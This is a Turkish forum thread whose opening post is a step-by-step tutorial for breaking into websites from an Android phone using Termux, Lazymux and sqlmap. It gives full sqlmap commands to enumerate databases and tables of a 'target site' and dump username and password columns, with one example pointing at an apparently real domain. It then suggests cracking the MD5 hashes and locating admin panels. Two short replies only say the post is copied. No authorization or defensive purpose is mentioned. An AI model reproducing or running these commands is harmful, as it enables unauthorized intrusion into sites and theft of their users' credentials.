İPUCU

Google Android Google Android işletim sistemine sahip tüm cep telefonları ve tabletler hakkında genel bilgiler

Seçenekler

Termux İle Site Hacklemek

15-04-2019 18:10
#1
DLXSHADOW - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
4
Teşekkür (Etti):
1
Teşekkür (Aldı):
2
Konular:
3
Google play 'a girip termux uygulamasini indiriyoruz daha sonra uygulamayi açıyoruz.
Uygulamayi açtiktan sonra biraz bekleyecek daha sonra komut ekrani gelecek
Komut satiri geldi simdi yapmamiz gereken şunlar ;

1-)apt update (uygulamayi günceller ve bunu birkere yaparsiniz)
2) pkg install git (bu komut ise git ' i kurar bunun sayesinde github sitesinden linux tabanli programlari klonlayabilir yani indirebilirsiniz)
3-)pkg install python (Bu komut en önemli komuttur çünkü bu komut sayesinde linux programlarini çaliştirabilirsiniz (.sh vs istisna) )
4-)pkg install python2(Bu komut python2 yi kurar bazı linux programlari python 'un yüksek sürümünü kullanir oyüzden bunuda kurmak şart )
Paketi kurmak için izin isteyecektir ( [Y/N] ) kurmak için Y yazip enter ' a basın)
Şimdi sıra web-hacking (website hacklemek için kullanicagimiz programlari kurmak)
Kurmak için git clone (kuracagimiz programin github adresi)

Bizim kuracagimiz program lazymux olacak.Lazymux nedir diye sorarsaniz
lazymux linux hack araçlarini içinde bulunduran dilediginizi kurmanizi saglayan program

Şimdi nasil kurulacagini anlatiyorum

Kurmak için git clone komutunu kullanacagiz

git clone https://github.com/Gameye98/Lazymux.git (yazip enter)

Daha sonra size yukarida bahsettiğim gibi Y/N paket kurulsun mu diye soracak
siz Y yazıp enter 'a basin paket kurulduktan sonra yazacagimiz komutlar şöyle

$: cd (komut satirina cd yazip enter)

$: ls (komut satirina ls yazip enter)

Komut satirina ls yazip enter 'a bastiğınız zaman şöyle bir şey belirecek

Lazymux

Bu git clone ile yüklediğimiz program olan lazymux programinin klasörü

Klasörü açmak için ;

$: cd Lazymux (komut satirina yazip enter)
$: ls (komut satirina yazip enter)

Ls yazdiktan sonra bizi ilgilendiren dosya şu olacak

lazymux.py

Bu dosya web siteleri hacklemek için kullanacagimiz programlari indirmemizi saglayacak

programi calistirmak için

$: python2 lazymux.py (komut satirina yazip enter)
Karşımıza numaralar gelicek

Burada seçim yapmak için seçeneklerin numarasi kullanilir

Örn;
01 : İnformation gathering

Bizim indirecegimiz program 05 yani web-hacking bölümünde

altta bulunan

lzmx> 05 yazip enter 'a bssiyoruz

Karşımıza birsürü program çıkıcak bizim kullanacagimiz program sqlmap programi (eger isterseniz baska programda yukleyebilirsiniz fakat sql injection yapamazsiniz wordpressscan xsheel vs vs)

Sqlmap programi ilk sirada olsudugu için 01 yazip enter 'a basiyoruz
Enter 'a bastiktan sonra size yine (Y/N) sorabilir Y yazip enter 'a basin program baya geniş çapli oldugu için receivering objects bölümünde yüklenmesi biraz uzun sürecektir.

Program yüklendikten sonra

[99] back to menu
[00] exit lazymux

yazisi çıkacak biz 00 yazip enter ' a basiyoruz ve lazymux programindan çikiyoruz

programdan çıktıktan sonra komut satırına ;

$: cd
$: ls
Daha sonra slmap klasörü görünecek

Lazymux . sqlmap

Biz sqlmap klasörüne gireceğiz

Klasöre girmek için komut satırına

$: cd sqlmap
$: ls

yazdiktan sonra yine sqlmap 'a ait doayalar görünecek bize lazim olan dosya ise;
sqlmap.py

Şimdi çalistirmadan önce nasil kullanacaginizi anlatiyim
İlk yapacagimiz işlem. şöyle ;
Sql açığı tespit ettiğiniz sitenin database sine girecegiz

Bunun için
komut satırına şu kodlari yaziyoruz ;


python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

hedef sitenin sql acigi buldugunuz bölümün url sini giriniz örnek ;

http://www.site.com/index.php?id=41

yukaridaki komutu girip enter 'a bastiginiz anda sql açıklı websitesini tarayıp database ' sine girecektir.(tarama biraz uzun sürebilir)

Tarama bittikten sonra databaseler ekrana gelecektir ;

[+]information_schema

[+]w3bdb

Databaseden tablolari cekmek icin komut satirina ;

$: python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=41" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables


Yukaridaki komutu yazdiktan sonra size databasede bulunan tablolari listeleyecektir bu liste çok uzun olabilir ve admin bilgilerini bulmanizi zorlastirabilir


Örnek
information_schema da bulunan tablolar
-------------------------------
TABLE_NAMES
USER_PRİVİLEGES
vsvs
---------------------------

Diyelimki admin user pass olan tabloyu buldunuz

Tablodaki verileri çekmek için ise ;

komut satırına ;

$: python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump

Bu komutu yaziyorsunuz sizde veri isimleri değişik olabilir ben örnek olarak yazdim

ekrana şöyle bir çıktı geldi varsayalim ;

-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çikarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz

Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.

İyi Hackler diliyorum. Umarım yararlı olmuştur.
Kullanıcı İmzası
Ziyaret Vakti.
trqala1453, MuhammedTRK Teşekkür etti.

15-04-2019 18:19
#2
KARA ALP - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2018
Nereden:
gizli bilgi
Mesajlar:
751
Teşekkür (Etti):
53
Teşekkür (Aldı):
135
Konular:
72
Daha once ayni şekilde açıldı alıntı bir konudir
Konu Tegin tarafından (15-04-2019 18:32 Saat 18:32 ) değiştirilmiştir.
17-04-2019 05:41
#3
KucukYigit - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2018
Nereden:
İstanbul
Mesajlar:
10
Teşekkür (Etti):
6
Teşekkür (Aldı):
3
Konular:
3
Bu konu sanki ayyıldız forumdan ama ...

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı